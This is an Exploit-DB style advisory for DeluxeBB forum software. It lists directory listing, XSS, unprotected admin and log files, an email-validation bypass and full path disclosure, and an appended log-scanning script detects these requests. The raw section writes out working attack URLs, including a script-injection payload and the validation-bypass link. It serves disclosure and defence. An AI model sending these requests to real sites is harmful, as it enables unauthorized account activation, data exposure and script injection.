Vendor: N/A
By: cp77fk4r
CVSS: 8.8 (HIGH)
CWE: 79, 79, 532, 532, 200, 200
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Directory Listing, Cross Site Scripting, Unprotected Admin Panel Files, Unprotected Log Files, Mail Registration Validation Bypass, Full Path Disclosure

Directory Listing: The server is vulnerable to directory listing, which allows an attacker to view the contents of a directory without authentication.
Cross Site Scripting: The server is vulnerable to Cross Site Scripting (XSS) attacks, which allow an attacker to inject malicious code into a web page.
Unprotected Admin Panel Files: The server is vulnerable to unauthorized access to the admin panel files, which allows an attacker to gain access to sensitive information.
Unprotected Log Files: The server is vulnerable to unauthorized access to log files, which allows an attacker to view sensitive information.
Mail Registration Validation Bypass: The server is vulnerable to mail registration validation bypass, which allows an attacker to bypass the registration validation process.
Full Path Disclosure: The server is vulnerable to full path disclosure, which allows an attacker to view the full path of a file.

Mitigation:

Directory Listing: The server should be configured to disable directory listing.
Cross Site Scripting: The server should be configured to validate user input and sanitize output.
Unprotected Admin Panel Files: The server should be configured to restrict access to the admin panel files.
Unprotected Log Files: The server should be configured to restrict access to the log files.
Mail Registration Validation Bypass: The server should be configured to validate user input and require authentication for registration.
Full Path Disclosure: The server should be configured to disable error messages.
Source

Exploit-DB raw data:

# Author: cp77fk4r | Empty0pagE[Shift+2]gmail.com
# Vendor: http://www.deluxebb.com
#
#[Directory Listing]
http://server/templates/
http://server/images/
http://server/logs/
http://server/wysiwyg/
http://server/docs/
http://server/classes
http://server/lang
http://server/settings/
#
#
#[Cross Site Scripting]
http://server/misc.php?sub=memberlist&page=-111111111111111111%3Cscript%3Ealert(1)%3C/script%3E
#
#
#[Unprotected Admin Panel Files]
http://server/templates/deluxe/admincp/
http://server/templates/corporate/admincp/
http://server/templates/blue/admincp/
#
#
#[Unprotected Log Files]
http://server/logs/cp.php
#
#
#[Mail Registration Validation Bypass]
After the user registration procedure, simply go to the link:
http://server/misc.php?sub=valemail&valmem=[USER_ID]&valnum=cp77fk4r
You can get your [USER_ID] from the last page of the Member-List section:
http://server/misc.php?sub=memberlist&page=[LAST_PAGE]
#
#
#
#[Full Path Disclosure]
http://server/misc.php?sub=memberlist&page=-11111111111111111
-you'll get an error like:
Fatal error: Maximum execution time of 30 seconds exceeded in [FULL_PATH]/tools.php on line [..]

or:
http://server/misc.php?sub=memberlist&page=-1.11111111111111E+FF
-you'll get an error like:
Fatal error: Allowed memory size of 68157440 bytes exhausted (tried to allocate 66584545 bytes) in [FULL_PATH]/tools.php on line [..]
#
#
#[E0F]
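
A log triage pass for the request patterns listed above, as an added example that is not part of the original advisory or of the affected software: it flags web-server access-log lines that match the advisory's URLs. The log lines are constructed, and the category names and the six-digit bound on a valid `page` value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Directories the advisory lists as browsable.
LISTED_DIRS = {"templates", "images", "logs", "wysiwyg", "docs",
               "classes", "lang", "settings"}
ADMINCP = re.compile(r"^/templates/[^/]+/admincp(/|$)")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a real member-list page number is a positive integer of <= 6 digits.
VALID_PAGE = re.compile(r"[1-9]\d{0,5}")

def classify(target):
    """Return the advisory categories matched by a request target (path?query)."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    hits = []
    if parts.path.strip("/") in LISTED_DIRS:
        hits.append("directory-listing")
    if ADMINCP.match(parts.path):
        hits.append("admincp-template")
    if parts.path == "/logs/cp.php":
        hits.append("log-file")
    if parts.path == "/misc.php":
        sub = query.get("sub", [""])[0]
        page = query.get("page", [None])[0]
        # Covers both the XSS and the path-disclosure requests: neither is a number.
        if sub == "memberlist" and page is not None and not VALID_PAGE.fullmatch(page):
            hits.append("bad-page-param")
        # Normal registrations send this too; it is a lead to review, not an alert.
        if sub == "valemail":
            hits.append("valemail-request")
    return hits

def scan(lines):
    findings = []  # (line_number, categories) for every matching log line
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        hits = classify(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample lines in combined log format (documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2020:10:00:00 +0000] "GET /misc.php?sub=memberlist&page=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2020:10:00:05 +0000] "GET /misc.php?sub=memberlist&page=-11111111111111111 HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2020:10:00:09 +0000] "GET /templates/blue/admincp/ HTTP/1.1" 200 2048',
    '192.0.2.44 - - [01/Jan/2020:10:00:12 +0000] "GET /settings/ HTTP/1.1" 200 700',
]
```

`scan(SAMPLE_LOG)` returns the line numbers and categories of the three flagged requests; once directory listing is disabled and the admin and log paths are restricted, those same requests should show 403 or 404 in the status column.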